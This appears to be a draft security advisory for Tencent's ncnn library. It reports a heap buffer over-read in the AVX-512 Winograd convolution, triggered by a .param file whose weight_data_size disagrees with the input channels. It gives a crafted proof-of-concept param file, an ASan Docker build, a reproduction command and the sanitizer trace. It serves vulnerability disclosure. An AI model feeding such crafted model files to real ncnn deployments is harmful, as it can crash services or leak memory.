All advisories
Draft

Heap Buffer Over-Read in x86 Winograd Convolution

Tencent/ncnn

Affected packages

ncnn other
Affected versions= 5e66f094bf7c597b4569cc014a8be84104748678
Patched versionsNot specified

Description

Heap Buffer Over-Read in x86 Winograd Convolution

Affected commit: 5e66f094bf7c597b4569cc014a8be84104748678
Sink: src/layer/x86/convolution_3x3_winograd.h:841 in gemm_transB_packed_tile
Sanitizer verdict: heap-buffer-overflow

Summary

ncnn derives a convolution's input-channel count two different ways — from the serialized weight_data_size when transforming the Winograd kernel, and from the runtime tensor when executing it. A .param file that makes the two disagree causes the AVX-512 Winograd F(4,3) GEMM to index tile slices far past the transformed-kernel allocation and read out of bounds. The confirmed entry point is tools/ncnnoptimize, which builds the pipeline during Net::load_model and executes the layer during ModelWriter::shape_inference(); the PoC needs no weight file at all (null is passed as the model).

Detail

The untrusted field is Convolution parameter key 6, weight_data_size. Convolution_x86::create_pipeline divides it to obtain the channel depth that the transformed-kernel buffer is sized for, while the forward pass recomputes the same quantity from the bottom blob:

// src/layer/x86/convolution_x86.cpp:301
    int kernel_size = kernel_w * kernel_h;
    int num_input = weight_data_size / kernel_size / num_output;

// src/layer/x86/convolution_3x3_winograd.h:3877
    AT.create(TILE_K * TILE_M, B, (K + TILE_K - 1) / TILE_K, (M + TILE_M - 1) / TILE_M, 4u, (Allocator*)0);

// src/layer/x86/convolution_3x3_winograd.h:5552
    const int M = top_blob.c * top_blob.elempack;
    const int N = tiles;
    const int K = bottom_blob.c * bottom_blob.elempack;

// src/layer/x86/convolution_3x3_winograd.h:5649
                const Mat AT_tile = AT.channel(i / TILE_M).depth(k / TILE_K);

conv3x3s1_winograd43_transform_kernel receives inch = num_input and allocates AT with ceil(inch / TILE_K) depth slices. conv3x3s1_winograd43 recomputes K from bottom_blob.c and iterates for (int k = 0; k < K; k += TILE_K), indexing AT.depth(k / TILE_K) without ever checking that index against AT.d. Mat::depth() is a plain stride multiply, so an out-of-range slice yields a pointer past the allocation, which gemm_transB_packed_tile then loads with _mm512_load_ps(pA).

The PoC declares Input data 0 1 data 0=31 1=31 2=512 and Convolution conv 1 1 data conv 0=16 1=3 2=1 3=1 4=0 5=0 6=4752. num_input is computed as 4752 / 9 / 16 = 33, which is > 8, so prefer_winograd holds and — with no bottom/top shape hints available at pipeline-creation time — the dynamic-shape branch at convolution_x86.cpp:372 transforms the kernel for 33 channels, yielding the 110,660-byte AT allocation in the ASan report. At forward time the tensor actually carries 512 unpacked channels, so K = 512 and the k loop issues roughly 32 tile iterations against an AT that holds only 3 depth slices. The first _mm512_load_ps that straddles the end of the buffer is the 64-byte read reported at offset 0x53300001b840, four bytes short of the region end at 0x53300001b844, and the process aborts.

Reproduce

Build and run (writes the Dockerfile, builds ncnn with ASan, runs the PoC)
mkdir -p ncnn-poc-heap-buffer-over-read-in-x86-winograd-convolution && cd ncnn-poc-heap-buffer-over-read-in-x86-winograd-convolution

cat > Dockerfile <<'DOCKERFILE'
FROM ubuntu:24.04

RUN apt-get update && apt-get install -y --no-install-recommends \
      git ca-certificates g++ cmake make python3 python3-pip python3-numpy \
      protobuf-compiler libprotobuf-dev \
 && pip3 install --no-cache-dir --break-system-packages onnx protobuf \
 && rm -rf /var/lib/apt/lists/*

RUN git clone --depth 1 https://github.com/Tencent/ncnn.git /ncnn

WORKDIR /ncnn
RUN cmake -S . -B build \
      -DCMAKE_BUILD_TYPE=Debug \
      -DCMAKE_C_FLAGS="-O0 -g -fsanitize=address" \
      -DCMAKE_CXX_FLAGS="-O0 -g -fsanitize=address" \
      -DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" \
      -DNCNN_BUILD_TOOLS=ON -DNCNN_BUILD_EXAMPLES=ON -DNCNN_BUILD_BENCHMARK=ON \
      -DNCNN_BUILD_TESTS=OFF -DNCNN_VULKAN=OFF -DNCNN_OPENMP=OFF \
 && cmake --build build -j"$(nproc)"

ENV ASAN_OPTIONS=detect_leaks=0
WORKDIR /poc
DOCKERFILE

cat > poc.param <<'PARAM'
7767517
2 2
Input data 0 1 data 0=31 1=31 2=512
Convolution conv 1 1 data conv 0=16 1=3 6=4752
PARAM

docker build -t ncnn-asan .
docker run --rm --network none -v "$PWD:/poc" ncnn-asan \
  /ncnn/build/tools/ncnnoptimize poc.param null out.param out.bin 0

AddressSanitizer output:

shape_inference
=================================================================
==1==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x53300001b840 at pc 0x59e445ca93f8 bp 0x7ffc649e99f0 sp 0x7ffc649e99e0
READ of size 64 at 0x53300001b840 thread T0
    #0 0x59e445ca93f7 in _mm512_load_ps(void const*) /usr/lib/gcc/x86_64-linux-gnu/13/include/avx512fintrin.h:431
    #1 0x59e445ca93f7 in gemm_transB_packed_tile /ncnn/src/layer/x86/convolution_3x3_winograd.h:841
    #2 0x59e445d2ba9a in conv3x3s1_winograd43 /ncnn/src/layer/x86/convolution_3x3_winograd.h:5653
    #3 0x59e44654dfda in ncnn::Convolution_x86_avx512::forward(ncnn::Mat const&, ncnn::Mat&, ncnn::Option const&) const /ncnn/build/src/layer/x86/convolution_x86_avx512.cpp:700
    #4 0x59e445715f2b in ncnn::NetPrivate::do_forward_layer(ncnn::Layer const*, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:721
    #5 0x59e445707b7f in ncnn::NetPrivate::forward_layer(int, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:167
    #6 0x59e4457679e9 in ncnn::Extractor::extract(int, ncnn::Mat&, int) /ncnn/src/net.cpp:2939
    #7 0x59e4455f93c0 in ModelWriter::shape_inference() /ncnn/tools/modelwriter.h:435
    #8 0x59e445676eee in main /ncnn/tools/ncnnoptimize.cpp:2844
    #9 0x78a1fa8221c9  (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #10 0x78a1fa82228a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #11 0x59e4455f6624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)

0x53300001b844 is located 0 bytes after 110660-byte region [0x533000000800,0x53300001b844)
allocated by thread T0 here:
    #0 0x78a1fae9bf1d in posix_memalign ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145
    #1 0x59e4456c887c in fastMalloc /ncnn/src/allocator.h:62
    #2 0x59e4456c887c in ncnn::Mat::create(int, int, int, int, unsigned long, ncnn::Allocator*) /ncnn/src/mat.cpp:457
    #3 0x59e445cf2880 in conv3x3s1_winograd43_transform_kernel /ncnn/src/layer/x86/convolution_3x3_winograd.h:3877
    #4 0x59e4465421a7 in ncnn::Convolution_x86_avx512::create_pipeline(ncnn::Option const&) /ncnn/build/src/layer/x86/convolution_x86_avx512.cpp:378
    #5 0x59e445762c96 in ncnn::Net::load_model(ncnn::DataReader const&) /ncnn/src/net.cpp:2094
    #6 0x59e445676c34 in main /ncnn/tools/ncnnoptimize.cpp:2793
    #7 0x78a1fa8221c9  (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #8 0x78a1fa82228a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #9 0x59e4455f6624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)

SUMMARY: AddressSanitizer: heap-buffer-overflow /usr/lib/gcc/x86_64-linux-gnu/13/include/avx512fintrin.h:431 in _mm512_load_ps(void const*)

Credit

Zheng Yu @ DepthFirst